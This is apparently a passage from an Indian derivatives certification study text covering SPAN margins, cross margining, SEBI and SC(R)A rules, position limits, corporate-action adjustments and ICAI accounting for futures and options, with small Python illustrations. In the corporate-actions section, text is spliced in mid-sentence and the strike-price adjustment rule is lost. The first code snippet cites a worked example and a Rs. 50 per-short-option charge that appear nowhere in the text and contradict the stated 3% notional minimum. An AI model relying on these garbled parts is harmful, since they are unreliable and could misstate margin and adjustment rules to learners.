Prior to Financial Year 2005-06, transactions in derivatives were considered as speculative transactions for the purpose of determination of tax liability under the Income-tax Act. This is in view of section 43(5) of the Income-tax Act, which defined a speculative transaction as a transaction in which a contract for purchase or sale of any commodity, including stocks and shares, is periodically or ultimately settled otherwise than by the actual delivery or transfer of the commodity or scrips. However, such transactions entered into by hedgers and stock exchange members in the course of jobbing or arbitrage activity were specifically excluded from the purview of the definition of speculative transaction. In view of the above provisions, most of the transactions entered into in derivatives by investors and speculators were considered as speculative transactions. The tax provisions provided for differential treatment with respect to set off and carry forward of loss on such transactions. Loss on derivative transactions could be set off only against other speculative income, and the same could not be set off against any other income. This resulted in payment of higher taxes by an assessee.

Finance Act, 2005 has amended section 43(5) so as to exclude transactions in derivatives carried out in a "recognized stock exchange" for this purpose. This implies that income or loss on derivative transactions which are carried out in a "recognized stock exchange" is not taxed as speculative income or loss. Thus, loss on derivative transactions can be set off against any other income during the year. In case the same cannot be set off, it can be carried forward to the subsequent assessment year and set off against any other income of the subsequent year. Such losses can be carried forward for a period of 8 assessment years. It may also be noted that securities transaction tax paid on such transactions is eligible as deduction under the Income-tax Act, 1961.

10.3.2 Securities transaction tax on derivatives transactions
As per Chapter VII of the Finance (No. 2) Act, 2004, Securities Transaction Tax (STT) is levied on all transactions of sale and/or purchase of equity shares and units of equity oriented funds and sale of derivatives entered into in a recognized stock exchange. As per Finance Act 2008, the following STT rates are applicable w.e.f. 1st June, 2008 in relation to sale of a derivative, where the transaction of such sale is entered into in a recognized stock exchange:

Sl. No. 1 — Sale of an option in securities — Rate: 0.017% — Payable by: Seller
Sl. No. 2 — Sale of an option in securities, where option is exercised — Rate: 0.125% — Payable by: Purchaser
Sl. No. 3 — Sale of a futures in securities — Rate: 0.017% — Payable by: Seller
Consider an example: an investor sells a futures contract of M/s. XYZ Ltd. (Lot Size: 1000) expiring on 29-Sep-2005 for Rs. 300. The spot price of the share is Rs. 290. The securities transaction tax thereon would be calculated as follows:
1. Total futures contract value = 1000 x 300 = Rs. 3,00,000
2. Securities transaction tax payable thereon = Rs. 3,00,000 x 0.017% = Rs. 51
No tax on such a transaction is payable by the buyer of the futures contract.
MODEL TEST PAPER
DERIVATIVES MARKET DEALERS MODULE

Q.1 Theta is also referred to as the _________ of the portfolio. [2 Marks]
(a) (b) (c) (d)

Q.2 An American style call option contract on the Nifty index with a strike price of 3040 expiring on the 30th June 2008 is specified as '30 JUN 2008 3040 CA'. [3 Marks]
(a) FALSE
(b) TRUE

Q.3 Clearing Members (CMs) and Trading Members (TMs) are required to collect upfront initial margins from all their Trading Members/Constituents. [2 Marks]
(a) FALSE
(b) TRUE

Q.4 All open positions in the index futures contracts are daily settled at the [2 Marks]
(a) mark-to-market settlement price
(b) net settlement price
(c) opening price
(d) closing price

Q.6 Usually, open interest is maximum in the _______ contract. [2 Marks]
(a) more liquid contracts
(b) far month
(c) middle month
(d) near month
Q.7 An equity index comprises of ______. [1 Mark]
(a) basket of stocks
(b) basket of bonds and stocks
(c) basket of tradeable debentures
(d) None of the above

Q.8 Position limits have been specified by _______ at trading member, client, market and FII levels respectively. [2 Marks]
(a) Sub brokers
(b) Brokers
(c) SEBI
(d) RBI

Q.9 An order which is activated when a price crosses a limit is _________ in the F&O segment of NSEIL. [1 Mark]
(a) stop loss order
(b) market order
(c) fill or kill order
(d) None of the above

Q.10 Which of the following is not a derivative transaction? [1 Mark]
(a) An investor buying index futures in the hope that the index will go up
(b) A copper fabricator entering into futures contracts to buy his annual requirements of copper
(c) A farmer selling his crop at a future date
(d) An exporter selling dollars in the spot market

Q.11 An investor is bearish about ABC Ltd. and sells ten one-month ABC Ltd. futures contracts at Rs. 5,00,000. On the last Thursday of the month, ABC Ltd. closes at Rs. 510. He makes a _________. (assume one lot = 100) [2 Marks]
(a) Profit of Rs. 10,000
(b) Loss of Rs. 10,000
(c) Loss of Rs. 5,100
(d) Profit of Rs. 5,100
Q.12 The interest rates are usually quoted on: [2 Marks]
(a) Per annum basis
(b) Per day basis
(c) Per week basis
(d) Per month basis

Q.13 After SPAN has scanned the 16 different scenarios of underlying market price and volatility changes, it selects the ________ loss from among these 16 observations. [2 Marks]
(a) largest
(b) 8th smallest
(c) smallest
(d) average

Q.14 Mr. Ram buys 100 calls on a stock with a strike of Rs. 200. He pays a premium of Rs. 50/call. A month later the stock trades in the market at Rs. 300. Upon exercise he will receive __________. [2 Marks]
(a) Rs. 10,000
(b) Rs. 1,200
(c) Rs. 1,000
(d) Rs. 1,150

Q.15 There are no Position Limits prescribed for Foreign Institutional Investors (FIIs) in the F&O Segment. [1 Mark]
(a) TRUE
(b) FALSE

Q.16 In the Black-Scholes Option Pricing Model, when S becomes very large a call option is almost certain to be exercised. [2 Marks]
(a) FALSE
(b) TRUE

Q.17 Suppose Nifty options trade for 1, 2 and 3 months expiry with strike prices of 1850, 1860, 1870, 1880, 1890, 1900, 1910. How many different options contracts will be tradable? [2 Marks]
(a) 27
(b) 42
(c) 18
(d) 24
Q.18 Prior to Financial Year 2005-06, transactions in derivatives were considered as speculative transactions for the purpose of determination of tax liability under the Income-tax Act. [1 Mark]
(a) TRUE
(b) FALSE

Q.19 ______ is allotted to the Custodial Participant (CP) by NSCCL. [3 Marks]
(a) A unique CP code
(b) An order identifier
(c) A PIN number
(d) A trade identifier

Q.20 An interest rate is 15% per annum when expressed with annual compounding. What is the equivalent rate with continuous compounding? [2 Marks]
(a) 14%
(b) 14.98%
(c) 14.50%
(d) 13.75%

Q.21 The favorable difference received by the buyer/holder on the exercise/expiry date, between the final settlement price and the strike price, will be recognized as ___________. [2 Marks]
(a) Income
(b) Expense
(c) Cannot say
(d) None

Q.22 The F&O segment of NSE provides trading facilities for the following derivative instruments, except: [2 Marks]
(a) Individual warrant options
(b) Index based futures
(c) Index based options
(d) Individual stock options

Q.23 Derivative is defined under SC(R)A to include: A contract which derives its value from the prices, or index of prices, of underlying securities. [1 Mark]
(a) TRUE
(b) FALSE
Q.24 The risk management activities and confirmation of trades through the trading system of NSE is carried out by _______. [2 Marks]
(a) users
(b) trading members
(c) clearing members
(d) participants

Q.25 A dealer sold one January Nifty futures contract for Rs. 2,50,000 on 15th January. Each Nifty futures contract is for delivery of 50 Nifties. On 25th January, the index closed at 5100. How much profit/loss did he make? [2 Marks]
(a) Profit of Rs. 9,000
(b) Loss of Rs. 9,500
(c) Loss of Rs. 8,000
(d) Loss of Rs. 5,000

Q.26 Manoj owns five hundred shares of ABC Ltd. Around budget time, he gets uncomfortable with the price movements. Which of the following will give him the hedge he desires (assuming that one futures contract = 100 shares)? [1 Mark]
(a) Buy 5 ABC Ltd. futures contracts
(b) Sell 10 ABC Ltd. futures contracts
(c) Sell 5 ABC Ltd. futures contracts
(d) Buy 10 ABC Ltd. futures contracts

Q.27 An investor is bearish about Tata Motors and sells ten one-month ABC Ltd. futures contracts at Rs. 6,00,000. On the last Thursday of the month, Tata Motors closes at Rs. 610. He makes a _________. (assume one lot = 100) [2 Marks]
(a) Profit of Rs. 10,000
(b) Loss of Rs. 10,000
(c) Profit of Rs. 8,000
(d) Loss of Rs. 8,000

Q.28 The beta of Jet Airways is 1.3. A person has a long Jet Airways position of Rs. 2,00,000 coupled with a short Nifty position of Rs. 1,00,000.
Q.29 Suppose a stock option contract trades for 1, 2 and 3 months expiry with strike prices of 85, 90, 95, 100, 105, 110, 115. How many different options contracts will be tradable? [2 Marks]
(a) 18
(b) 32
(c) 21
(d) 42

Q.30 The bull spread can be created by only buying and selling [2 Marks]
(a) basket option
(b) futures
(c) warrant
(d) options

Q.31 A stock broker means a member of _______. [1 Mark]
(a) SEBI
(b) any exchange
(c) a recognized stock exchange
(d) any stock exchange

Q.32 Ashish is bullish about HLL, which trades in the spot market at Rs. 210. He buys 10 three-month call option contracts on HLL with a strike of 230 at a premium of Rs. 1.05 per call. Three months later, HLL closes at Rs. 250. Assuming 1 contract = 100 shares, his profit on the position is ____. [1 Mark]
(a) Rs. 18,950
(b) Rs. 19,500
(c) Rs. 20,000
(d) Rs. 19,000
Q.35 In the books of the buyer/holder of the option, the premium paid would be ___________ to 'Equity Index Option Premium Account' or 'Equity Stock Option Premium Account', as the case may be. [2 Marks]
(a) Debited
(b) Credited
(c) Depends
(d) None

Q.38 Trading member Shantilal took a proprietary purchase position in a March 2000 contract. He bought 1500 units @ Rs. 1200 and sold 1400 @ Rs. 1221. The end of day settlement price was Rs. 1220. What is the outstanding position on which initial margin will be calculated? [1 Mark]
(a) 300 units
(b) 200 units
(c) 100 units
(d) 500 units

Q.39 In which year were foreign currency futures based on the new floating exchange rate system introduced at the Chicago Mercantile Exchange? [1 Mark]
(a) 1970
(b) 1975
(c) 1972
(d) 1974

Q.41 With the introduction of derivatives, the underlying cash market witnesses _______. [1 Mark]
(a) lower volumes
(b) sometimes higher, sometimes lower volumes
(c) higher volumes

Q.42 … [1 Mark]
(a) TRUE
(b) FALSE

Q.43 … [1 Mark]
(a) 35
(b) 15
(c) 5
(d) 1

Q.44 The value of a call option ___________ with a decrease in the spot price. [2 Marks]
(a) increases
(b) does not change
(c) decreases
(d) increases or decreases
Q.46 NSE trades Nifty, BANK Nifty, CNX IT, Nifty Midcap 50 and Mini Nifty futures contracts having all the expiry cycles, except: [2 Marks]
(a) Two-month expiry cycles
(b) Four month expiry cycles
(c) Three-month expiry cycles
(d) One-month expiry cycles

Q.47 An investor owns one thousand shares of Reliance. Around budget time, he gets uncomfortable with the price movements. One contract on Reliance is equivalent to 100 shares. Which of the following will give him the hedge he desires? [2 Marks]
(a) Buy 5 Reliance futures contracts
(b) Sell 10 Reliance futures contracts
(c) Sell 5 Reliance futures contracts
(d) Buy 10 Reliance futures contracts

Q.48 Spot Price = Rs. 98. Call Option Strike Price = Rs. 100. Premium = Rs. 4. An investor buys the Option contract. On Expiry of the Option the Spot price is Rs. 108. Net profit for the Buyer of the Option is ___. [1 Mark]
(a) Rs. 6
(b) Rs. 5
(c) Rs. 2
(d) Rs. 4

Q.49 In the NEAT F&O system, the hierarchy amongst users comprises of _______. [2 Marks]
(a) branch manager, corporate manager, dealer
(b) corporate manager, branch manager, dealer
(c) dealer, corporate manager, branch manager
(d) corporate manager, dealer, branch manager

Q.50 The open position for the proprietary trades will be on a _______. [3 Marks]
(a) net basis
(b) gross basis

Q.51 The minimum networth for clearing members of the derivatives clearing corporation/house shall be __________. [2 Marks]
(a) Rs. 250 Lakh
(b) Rs. 300 Lakh
(c) Rs. 500 Lakh
(d) None of the above
Q.52 The Black-Scholes option pricing model was developed in _____. [2 Marks]
(a) 1923
(b) 1973
(c) 1887
(d) 1987

Q.53 In the case of index futures contracts, the daily settlement price is the ______. [3 Marks]
(a) closing price of futures contract
(b) opening price of futures contract
(c) closing spot index value
(d) opening spot index value

Q.54 Premium Margin is levied at ________ level. [1 Mark]
(a) client
(b) clearing member
(c) broker
(d) trading member

Q.55 In the Black-Scholes Option Pricing Model, as S becomes very large, both N(d1) and N(d2) are close to 1.0. [2 Marks]
(a) FALSE
(b) TRUE

Q.56 To operate in the derivative segment of NSE, the dealer/broker and sales persons are required to pass the _________ examination. [1 Mark]
(a) Certified Financial Analyst
(b) MBA (Finance)
(c) NCFM
(d) Chartered Accountancy
(e) Not Attempted

Q.57 The NEAT F&O trading system ____________. [1 Mark]
(a) allows one to enter spread trades
(b) does not allow spread trades
(c) allows only a single order placement at a time
(d) None of the above
Q.58 Margins levied on a member in respect of options contracts are Initial Margin, Premium Margin and Assignment Margin. [1 Mark]
(a) TRUE
(b) FALSE

Q.59 American option prices are frequently deduced from those of the European counterpart. [1 Mark]
(a) FALSE
(b) TRUE

Q.60 Which of the following is closest to the forward price of a share if Cash Price = Rs. 750, Futures Contract Maturity = 1 year from date, Market Interest rate = 12% and dividend expected is 6%? [2 Marks]
(a) Rs. 795
(b) Rs. 705
(c) Rs. 845
(d) None of these
Hi Team,
I am using a secured environment where the Python code works fine, but after converting the code to a .exe file using PyInstaller it gives the errors below.
Code for connecting to pod
from ucsmsdk.ucshandle import UcsHandle
handle = UcsHandle("n.n.n.n", "username", "password")
handle.login()
Trials:
1. I ran the .exe file on Windows 2012 R2 and 2016 servers, but it raises a 'Not a supported server' error (FYI, it works fine when I run the same code as a .py file).
2. I have also tried it from my virtual desktop directly and still get "urlopen error tunnel connection failed: 400 bad request".
3. If I use the hostname instead of the IP n.n.n.n, then "urlopen error [Errno 11004] getaddrinfo failed" is raised.
Kindly let me know why it is not connecting through the .exe file and how we can overcome this issue.
Thanks in advance | https://community.cisco.com/t5/cisco-developed-ucs-integrations/unable-to-connect-to-ucs-manager-using-ucsmsdk-after-converting/m-p/4038569 | CC-MAIN-2021-21 | refinedweb | 151 | 70.7 |
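Edit: a small diagnostic sketch I am using to narrow this down — the "tunnel connection failed: 400 bad request" message usually comes from urllib trying to CONNECT through an HTTP(S) proxy, and "[Errno 11004] getaddrinfo failed" means the hostname did not resolve. The proxy variables and the hostname below are assumptions about the environment, not a confirmed fix:

```python
import os
import socket

# Frozen .exe builds often inherit HTTP_PROXY/HTTPS_PROXY from the service
# environment even when the interactive session that ran the .py did not.
for var in ("HTTP_PROXY", "HTTPS_PROXY", "http_proxy", "https_proxy"):
    if var in os.environ:
        print(f"{var} is set to {os.environ[var]!r}; UCSM traffic may be proxied")
        # os.environ.pop(var)  # uncomment to bypass the proxy for this process

# Check name resolution before calling handle.login().
try:
    print(socket.gethostbyname("localhost"))  # replace with the UCSM hostname
except socket.gaierror as exc:
    print("DNS lookup failed:", exc)
```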
Are there situations in which sys.stdout.write() is preferable to print?

print is just a thin wrapper that formats the inputs (a space between arguments and a newline at the end) and calls the write function of a given object. By default this object is sys.stdout, but you can pass a file, for example:
print >> open('file.txt', 'w'), 'Hello', 'World', 2+3
In Python 3.x, print becomes a function, but it is still possible to pass something other than sys.stdout thanks to the file argument.
In Python 2.6+, print is still a statement, but it can be used as a function after:
from __future__ import print_function
Update: There is a little difference between the print function and the print statement (and more generally between a function and a statement) pointed out by Bakuriu in the comments.
In case of an error when evaluating the arguments:

print "something", 1/0, "other"   # prints only "something" before 1/0 raises an exception
print("something", 1/0, "other")  # prints nothing: the arguments are evaluated first, so the function is never called

https://codedump.io/share/JCht7Z4GQIXr/1/python---the-difference-between-sysstdoutwrite-and-print | CC-MAIN-2016-50 | refinedweb | 105 | 66.74
Hey guys. Just wanna release something small and really useful. You all know about grabbing userids from Facebook groups, profiles etc. You had to scroll down to the end of the page or just press the End button. I wrote some code which you can use for this purpose. The code is written in C++, just use a compiler to compile it:

#include <iostream>
#include <windows.h>

using namespace std;

int main()
{
    INPUT key = {};                          // zero-initialize time, wScan, dwExtraInfo
    key.type = INPUT_KEYBOARD;
    key.ki.wVk = VK_END;                     // 0x23 = End key
    while (true) {
        Sleep(1000);                         // <- time in milliseconds
        cout << "Pressing END-Button" << endl;
        key.ki.dwFlags = 0;                  // key down
        SendInput(1, &key, sizeof(key));
        key.ki.dwFlags = KEYEVENTF_KEYUP;    // release the key again
        SendInput(1, &key, sizeof(key));
    }
    return 0;
}

Leave a thanks if it helped you, maybe I'm gonna code an automated grabber or something like that.
https://www.blackhatworld.com/seo/useful-faceook-end-button-clicker.700664/ | CC-MAIN-2017-39 | refinedweb | 136 | 77.43
In this article, you are going to learn about how to install TensorFlow on Raspberry Pi.
Originally developed by the Google Brain team to conduct machine learning and deep neural networks research, TensorFlow is general enough to be applicable in a wide variety of other domains.
TensorFlow is an open-source machine learning software library for numerical computation using data flow graphs. The graph nodes represent mathematical operations, while the graph edges represent the multi-dimensional data arrays (tensors) that flow between them. This flexible architecture gives you the ability to deploy computation to one or more CPUs or GPUs in a desktop, server, or mobile device without rewriting code.
Installing TensorFlow on Your Raspberry Pi
Installing TensorFlow on Raspberry Pi used to be a frustrating task. However, with the newer versions of Google TensorFlow officially supported on Raspberry Pi, you just need a couple of commands to get it installed.
First, make sure that your Raspberry Pi is up to date by typing the following commands. These commands update the installed packages on your Raspberry Pi to the latest versions.
sudo apt-get update sudo apt-get upgrade
With your Raspberry Pi up to date, install Google TensorFlow by typing the following commands in the terminal:
sudo apt install libatlas-base-dev pip3 install tensorflow
Testing TensorFlow
Let’s double-check the installation. To check whether or not TensorFlow is installed, start Python by typing:

python3
And then
import tensorflow
The import might print some runtime warnings if you are using a Python version greater than 3.4. Just ignore them; everything will work fine.
To check which version of TensorFlow you have, type the following command:

tensorflow.__version__
Hello World Example
Let’s write a simple code provided by Google for testing TensorFlow that will print hello world.
import tensorflow as tf

hello = tf.constant('Hello, TensorFlow!')
sess = tf.Session()
print(sess.run(hello))
You should see “Hello, TensorFlow” printed.
If you are running Python 3.5, you will get several runtime warnings. The official TensorFlow tutorials acknowledge that this happens, and recommend you ignore it.
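If the warning noise bothers you, there are two commonly used knobs (neither is required for this tutorial). The TF_CPP_MIN_LOG_LEVEL environment variable silences TensorFlow's native (C++) log chatter, and the standard warnings module can mute the Python-level RuntimeWarnings mentioned above; both must be applied before TensorFlow is imported:

```python
import os
import warnings

# Silence TensorFlow's native log chatter: 0 = all, 1 = no INFO,
# 2 = no INFO/WARNING, 3 = errors only. Must be set before importing tensorflow.
os.environ["TF_CPP_MIN_LOG_LEVEL"] = "2"

# Mute the Python-level RuntimeWarnings (e.g. the 3.4-vs-3.5 compiletime notice).
warnings.filterwarnings("ignore", category=RuntimeWarning)

# import tensorflow  # do the import only after the two settings above
```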
Installing the Image Classifier
First, create a new directory to hold the TensorFlow models.
mkdir tensorflow cd tensorflow
Now, clone the TensorFlow models repository in this new directory.
git clone https://github.com/tensorflow/models.git
We are going to use the image classification example that comes with the models, so navigate to that folder:
cd models/tutorials/image/imagenet
Now run the script. It will feed a standard image of a panda to the neural network, which in return guesses what the image contains and reports a confidence score.
python3 classify_image.py
Let’s give our own image to the neural network and see whether it can identify objects in the image or not.
I placed an image of a dog into the same folder we are already working in. Now I’ll run the script to see what it comes up with as a guess.
python3 classify_image.py --image_file=dog.jpg
It comes up with the following guesses:
As you can see, it recognized that the highest probability of this image was that of a pug. | https://maker.pro/raspberry-pi/tutorial/how-to-set-up-the-machine-learning-software-tensorflow-on-raspberry-pi | CC-MAIN-2019-35 | refinedweb | 515 | 53.1 |
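Under the hood, classify_image.py is ranking the network's output scores. The labels and numbers below are made up, but the ranking step it performs looks like this:

```python
import math

# Hypothetical raw network outputs (logits) for a few made-up labels.
logits = {"pug": 8.2, "bull mastiff": 5.1, "French bulldog": 4.7, "tabby": 0.3}

# Softmax converts logits into probabilities that sum to 1.
total = sum(math.exp(v) for v in logits.values())
probs = {label: math.exp(v) / total for label, v in logits.items()}

# Print the guesses, best first, in the same spirit as the script's output.
for label, p in sorted(probs.items(), key=lambda kv: -kv[1]):
    print(f"{label} (score = {p:.5f})")
```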
If you build dotCMS from source code, the source includes functional tests which allow you to test the system against functional requirements. Functional tests are developed using user stories to ensure that the end results of dotCMS processes (data, return values, outputs, etc.) match the expected user requirements.
Requirements
To enable running functional tests from the command line, the following gradle command must be run before deploying dotCMS and building your Tomcat directory (using the
./gradlew deployWarTomcat command mentioned in the developing from source documentation):
./gradlew deployWarTomcatTests
Functional Test URLs
There are different ways to call the tests and, depending on how they are called, the results will differ. There are three parameters that can be passed to the test server:
Examples
class
method
resultType
Return Code
The test servlet will return one of two codes to indicate the status of the tests:
Sample Results
Plain Text
XML File
All Functional Tests Suite
The AllTestsSuite.java file contains the names of all the functional test Java classes. This file can be found in the /src/functional-test/java/com/ testing package.
Running the Suite
You may run the test suite in two ways:
- Use ant tasks:
- Execute the test-dotcms task of the build.xml.
- Make direct calls to the servlet:
- Execute the “deploy-tests” task of the build.xml
- Run the application
- Make the calls directly to the test servlet.
Adding Tests
You can add unit tests for your classes by adding entries for each class to the test module in the /test/ folder in your dotCMS build folder. This allows you to call your tests directly (specifying the class and/or test method).
If you wish for your tests to be run when the ALLTestsSuite is run, you must also add your tests to the main test suite.
The following shows the format of an entry for a test in the test module:
@RunWith(Suite.class)
@Suite.SuiteClasses({
    FieldFactoryTest.class,
    StructureFactoryTest.class,
    ContentletFactoryTest.class,
    ContentletAPITest.class
})
public class AllTestsSuite {
}

https://dotcms.com/docs/latest/functional-tests | CC-MAIN-2018-17 | refinedweb | 338 | 60.75
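As a concrete illustration, a direct servlet call selecting one test might look like the following. The base URL and the method name are assumptions for illustration only (the servlet path and the accepted resultType values depend on your deployment); the three parameter names come from the documentation above, and the class name is one of the suite classes listed:

```shell
# Hypothetical host and servlet path -- adjust to your deployment.
BASE="http://localhost:8080/servlet/test"

# class / method / resultType are the three documented parameters; the
# method name testSaveField is illustrative only.
URL="${BASE}?class=FieldFactoryTest&method=testSaveField&resultType=plain"
echo "$URL"
# curl "$URL"   # run this against a deployed server to execute the test
```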
09 December 2011 07:08 [Source: ICIS news]
SINGAPORE (ICIS)--Asia’s naphtha prices will stay firm in December, supported by expectations of fresh spot demand.
In line with the strong prices, the naphtha spread between the contracts for the second half of January and the second half of February widened to $5.50/tonne (€4.13/tonne) in backwardation from parity a month ago, ICIS data showed.
The naphtha crack spread versus Brent crude futures nearly tripled from the levels seen in early November to above $90/tonne on the close of trade on 8 December, the data showed.
“The demand for heavy grade naphtha is strong and there isn’t much supply available,” a trader said, adding that the premium for heavier grade naphtha was more than $10/tonne.
Both
South Korea’s Honam Petrochemical bought 25,000 tonnes of naphtha for delivery into Daesan in the first half of January at a premium of $4/tonne to Japan quotes CFR (cost & freight) earlier in the week, while LG Chem subsequently bought supplies for delivery into Yeosu in the second half of January at a wider premium of $5/tonne, the traders said.
“Supply is tight for January, especially for the first half of the month,” a third trader added.
The rising naphtha prices in Asia, which increased to above the $900/tonne CFR Japan level seen this week, have sparked off a rally in the east-west spread, boosting the opening of the arbitrage window to bring in barrels from
The east-west spread strengthened to $21.72/tonne on 8 December from $21.02/tonne on the close of 7 December, the traders said. The spread was at $10.49/tonne four weeks ago, they added.
For December, around 150,000 tonnes of deep-sea Western naphtha will be shipped to
Meanwhile, a recovery in butadiene (BD) prices, which are supported by limited supply and production cuts, is boosting the naphtha market, the traders added.
Spot BD prices continued to increase, rising to above $2,100/tonne
The BD prices, which were assessed at $1,570-1,650/tonne CFR NE Asia four weeks ago, drew support from increased Chinese demand and limited availability.
The market is bracing for
FPCC has raised the operating rates at its three naphtha crackers to meet a stronger demand from its downstream derivative products. The company operates a 700,000 tonne/year No 1 cracker, a 1.03m tonne/year No 2 unit and a 1.2m tonne/year unit in Mailiao. “The market is hopeful,” a fourth trader said.
($1 = €0.75)
For more on butadiene and naphtha, | http://www.icis.com/Articles/2011/12/09/9515243/asia-naphtha-to-firm-on-fpcc-buying-hopes-firm-butadiene.html | CC-MAIN-2014-49 | refinedweb | 443 | 67.89 |
Sentient Computing Lab
dedair writes "From the people who brought you VNC, AT&T labs has been working on an ultrasonic location system that they use in their labs in Cambridge, Engalnd. It turns a whole building into a virtual computing center. No matter where you are in the building, your phone calls can be forwarded to you and with the use of VNC, your desktop is always in front of you. Pretty cool stuff with more details at their website."
Re:How does everyone else view VNC (Score:1)
Re:Olivetti on Discovery years ago (Score:1)
I can get my e-mail in the bathroom now.. (Score:1)
Re:Cool, so can I? (Score:1)
Ok, so I just made it up. Shoot me.
I don't like it (Score:1)
It even knows what shirt color you're wearing!! (Score:1)
Re:Uhmm... sentient? (Score:1)
Slashdot Spellchecker To Coming Online....? (Score:1)
C'mon, Hemos. If you had read your post even once before you submitted it you would've caught, "Engalnd".
the future is here (Score:1)
Of course, now my computer will start talking like Rudy and I'll never get any work done at all.
-Chris
...More Powerful than Otto Preminger...
Re:Bluetooth (Score:1)
The current versions for phones are not even capable of working without line of sight. If they require LOS then why not use IR instead? The more powerful versions will be able to penetrate clothing and such, but since they will draw more juice they will probably not be the ones used in the first products.
Furthermore it seems like Bluetooth has been stricken by a severe case of "design by committee". That is, it lost track of the technical applications and instead it's become a part for marketing.
And I can not understand why so many want Bluetooth as a NIC in a computer. If you want wireless LAN there are already a bunch of products based on IEEE802.11x on the market NOW! Why wait for Bluetooth? Sure, it's supposed to have really low power consumtion, but does it matter in a laptop with an LCD, harddrive and CD-Rom?
Finally, Bluetooth is a NETWORK layer. It's not a "end of all protocols magic wand" that some people seem to think. It will NOT make your homestereo talk with Mr Coffee. It will NOT allow you to program your VCR through the computer (or palmtop). It's just a stupid (in a protocolly-challenged way) network for crying out loud!
What you WANT is something like Jini from SUN. But a version that is actually available on the market. And need I say this an OPEN standard. Sony has already developed near magical things for their home entertainment systems, like S-Link and newer versions of it. But unless you are a member of the "Happy Sony Family" and only have their products on the shelf then it won't do diddly/squat. Why not let the customers use the API to create their own shortcuts in the home?
Re:AT&T Didn't give us VNC (Score:1)
Q I thought this was something to do with ORL? What's the Olivetti/Oracle link here?
A In January 1999, AT&T acquired ORL, the Olivetti Research Laboratory founded 12 years earlier, and recently jointly funded by Oracle, to create AT&T Laboratories Cambridge.
Here is the link for VNC
And the faq
KH-ing ?
Re:Typical, England brought you 1984, (Score:1)
Re:General pager/cell-phone rant response (Score:1)
Re:AT&T Didn't give us VNC (Score:1)
Re:AT&T Didn't give us VNC (Score:1)
Re:How does everyone else view VNC (Score:1)
(I'm only talking of doing admin on WinBoxes here), it's IMHO faster and more versatile than VNC, and offers a HUGE amount of other features such as a SSH telnet server, remote file manipulation, process level info, performance graph, etc...
So okay it's not free (as in Beer) like VNC, but is an outstanding product, they have a trial version, give it a spin.
Murphy(c)
Bit more detail (Score:1)
Don't know why this has suddenly appeared on
Re:Can you turn it off? (Score:1)
Re:Ensure Technologies (Score:1)
How do you solve that one? One idea was to have the ID in a ring so that it only picks you up when your hands go within ~20cm of the keyboard... with a suitable hystresis and a fast enough log in, this could work...
AT&T Didn't give us VNC (Score:1)
Just want to give credit where credit is due.
/
Privacy vs. Utility (Score:1)
The bat opens doors so you don't have to take your keys out; notifies you of email and phone calls, which you can then access at the nearest computer or phone; allows you to drop any of your VNC desktops onto the nearest workstation; allows you to determine when someone is in a meeting or on the phone and therefore saving you a fruitless walk over to their office; and so on.
And yes, it is fantastic watching everyone moving around on the magic map.
Rupert.
sounds nice but... (Score:1)
All I need now (Score:1)
Re:Can you turn it off? (Score:1)
although I understand that soem people do ever want anyone to know anything about them so maybe the original reply of mine was a little harsh
Jon
Re:Can you turn it off? (Score:1)
Technology for people who don't want to do anythin (Score:1)
The problem is you have to exit the entire building to leave "The System". Sorry, this virtual womb thing sounds fascinating and all, but like sometimes one needs to um exit, leave, depart, you know... breathe.
Course, we know why this is going to become more common. Consumers don't really want to go anywhere today. They just want less intrusion into their lives, least of all the sort of intrusion that requires them to put in some effort, which means more modern inconveniences will intrude. Imagine the shock of realizing they have no life once these inconveniences stop distracting them from the life they don't actually have.
As I always say, Big Brother is just a shadow cast by millions of little brethren.
Re:Typical, England brought you 1984, (Score:1)
Aldous Huxley wrote um Brave New World.
1984 is the work of Eric Blair aka George Orwell.
Re:On second thought Big Brother is a good thing (Score:1)
I'm not saying a contractor should get residual income from the hotel he's building, that's a separate enterprise which he has no legal claim to and should have no legal claim to.
But he should get paid more than the amount he gets to build a deck.
Re:Cool, so can I? (Score:1)
Nah. They don't have sensors in the bathrooms. Or PCs, for that matter.
Some of the guys in this lab supervise students here; a friend of mine turned up to a supervision and met his supervisor at the door - the supervisor had opened up a security camera display on his desktop and kept an eye out for him.
Another cool toy they've got is remote dial-in access to the security cameras from their cellphones: being geeks, they use it to check for parking spaces in the company car park before coming in
:-)
Sounds like a serious geek paradise, this place!
Re:Hemos sniffed Three Lines from the mirror (Score:1)
Rich
Why? (Score:1)
Re:Can you turn it off? (Score:1)
It does kind of look like someone was watching STNG for a little too long, which bugs me because on the USS 1701D You can just say "computer, locate my slacker employee" and it tells you what they're up to.
Yeah, but they fixed it in DS9 and VOY.
;) Now all you have to do is take off your com-badge and leave it in the restroom.
"Computer, locate ensign Kim."
"Ensign Kim is taking a dump and cannot be disturbed at this time."
Re:Can you turn it off? (Score:1)
and i`m getting subtle movements...its like hes moving, yet his location isnt changing...
funny (Score:1)
As a proof of concept, it's great. But personal freedom is a slippery slope. Once we start down the path, it's too easy to keep adding more monitoring.
On the other hand, NSA is just loving the possiblities with this!
How does everyone else view VNC (Score:1)
Re:Typical, England brought you 1984, (Score:1)
Huxley wrote 'Brave New World'
Re:Can you turn it off? (Score:1)
Re:Can you turn it off? (Score:1)
Re:Cool, so can I? (Score:1)
Re:AT&T Didn't give us VNC (Score:1)
-Ciaran
Re:Can you turn it off? (Score:1)
IIRC, there was some sort of light sensor on the badges that ensured they weren't active when, eg. in a desk drawer. It was possible to turn off the device simply by placing it in the dark.
-Ciaran
This is ANTI-Big brother.... (Score:1)
Re:Of course the real question here is... (Score:1)
Sean
Y'know what would be totally awesome? (Score:1)
"Ishpeck to bridge, we've got a subspace quazi-spectral anomoly here---I'd like to run a level one diagnostic on the ship's sensor array."
Re:Can you turn it off? (Score:1)
Bluetooth (Score:1)
Bluetooth will let PCs, PDAs, phones, printers, headsets, sensors all interact with each other in a PicoNet, which is a small personal area network. There are currently two cards available which support the Bluetooth 1.0/1.1 stack on Windows and Linux. They are made by Motorola and IBM.
Here [ibm.com] is a manual for IBM's bluetooth card if you want to take a look at the software and what Bluetooth is capable of.
Ericsson also makes a wireless Bluetooth headset that will attach itself as an audio device to your PC, cordless phone or mobile phone. You can leave your phone in your briefcase or in your living room and take a call in your office over your Piconet.
Pretty cool stuff, hopefully we'll see more in the way of innovation of Bluetooth in the next year.
-Pat
Ensure Technologies (Score:1)
